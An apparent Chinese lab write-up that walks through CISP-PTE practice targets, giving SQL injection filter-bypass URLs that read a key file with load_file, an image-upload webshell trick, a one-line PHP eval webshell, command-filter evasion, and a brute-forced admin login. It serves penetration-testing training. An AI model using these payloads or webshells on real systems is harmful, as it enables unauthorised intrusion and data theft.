CISP-PTE基础题靶机解题思路详解<\/h1>

一、SQL注入绕过技巧<\/h2>

1. 过滤字符绕过方法<\/h3>

空格过滤<\/strong>：使用%0a<\/code>或%0d<\/code>代替%20<\/code><\/li>
#号过滤<\/strong>：使用%23<\/code>代替<\/li>

union过滤<\/strong>：使用双写绕过(ununionion<\/code>)<\/li> <\/ul> 2. 注入步骤详解<\/h3> 确定字段数<\/strong>：<\/p> http:\/\/172.16.12.100:81\/vulnerabilities\/fu1.php?id=1%27)%0dorder%0dby%0d4%23 http:\/\/172.16.12.100:81\/vulnerabilities\/fu1.php?id=1%27)%0dorder%0dby%0d5%23 <\/code><\/pre> <\/li> 使用union注入读取文件<\/strong>：<\/p> http:\/\/172.16.12.100:81\/vulnerabilities\/fu1.php?id=10%27)%0dununionion%0dselect%0d1,load_file(%22\/tmp\/360\/key%22),2,3%23 <\/code><\/pre> 使用load_file()<\/code>函数读取\/tmp\/360\/key<\/code>文件<\/li> 获取key: 8b3h4a7v<\/code><\/li> <\/ul> <\/li> <\/ol> 二、文件上传突破技巧<\/h2> 1. 上传测试过程<\/h3> 直接上传.php<\/code>文件被拦截<\/li> 尝试.abcdef<\/code>后缀无反应<\/li> .png<\/code>图片可以上传成功<\/li> <\/ol> 2. 绕过方法尝试<\/h3> 修改请求包<\/strong>：<\/p> 修改文件后缀为.php<\/code><\/li> 修改Content-Type<\/code>为image\/png<\/code><\/li> 仍然被拦截，说明还检测文件头<\/li> <\/ul> <\/li> 制作图片马<\/strong>：<\/p> 在图片中嵌入PHP代码<\/li> 修改后缀为.php4<\/code>可被解析<\/li> <\/ul> <\/li> <\/ol> 3. 获取key<\/h3> 使用蚁剑连接<\/li> 在\/var\/www\/html\/key.php<\/code>中找到key: 8t5s0x5t<\/code><\/li> <\/ul> 三、文件包含漏洞利用<\/h2> 1. 利用方法<\/h3> 写入PHP文件<\/strong>：<\/p> <?<\/span>php<\/span> phpinfo<\/span>(); ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 写入一句话木马<\/strong>：<\/p> <?<\/span>php<\/span> eval<\/span>($_POST['cmd'<\/span>]); ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. 获取key<\/h3> 使用蚁剑连接<\/li> 在\/var\/www\/html\/key.php<\/code>中找到key: 6u3x9t2p<\/code><\/li> <\/ul> 四、命令执行绕过<\/h2> 1. 受限命令<\/h3> cat<\/code>、ls<\/code>、vim<\/code>、echo<\/code>被禁用<\/li> <\/ul> 2. 可用命令<\/h3> find<\/code>和grep<\/code>未被禁用<\/li> <\/ul> 3. 获取key步骤<\/h3> 使用find<\/code>定位key.php文件<\/li> 使用grep<\/code>查找key关键字<\/li> 获取key: 3s9j6c2k<\/code><\/li> <\/ol> 五、日志分析技巧<\/h2> 1. 分析步骤<\/h3> IP过滤<\/strong>：<\/p> grep "172.16.12.12"<\/span> 日志分析.txt >> 日志分析1.txt <\/span><\/span><\/code><\/pre><\/li> 状态码过滤<\/strong>：<\/p> grep "200"<\/span> 日志分析1.txt >> 日志分析2.txt <\/span><\/span><\/code><\/pre><\/li> 发现关键页面<\/strong>：<\/p> \/adminlogin.php<\/code>出现频率最高<\/li> <\/ul> <\/li> <\/ol> 2. 爆破登录<\/h3> 抓包使用字典爆破<\/li> 获取凭证：账号: admin<\/code><\/li> 密码: password123<\/code><\/li> <\/ul> <\/li> 登录后获取key: 9y6u8s5m<\/code><\/li> <\/ol> 六、工具推荐<\/h2> 360星图日志分析工具<\/li> <\/ul> 总结<\/h2> SQL注入：注意字符过滤绕过<\/li> 文件上传：尝试多种绕过方式(后缀、Content-Type、文件头)<\/li> 文件包含：利用写文件功能<\/li> 命令执行：寻找未被禁用的替代命令<\/li> 日志分析：分步过滤关键信息<\/li> <\/ol> 通过以上方法可系统性地解决CISP-PTE基础题靶机中的各类漏洞利用问题。<\/p>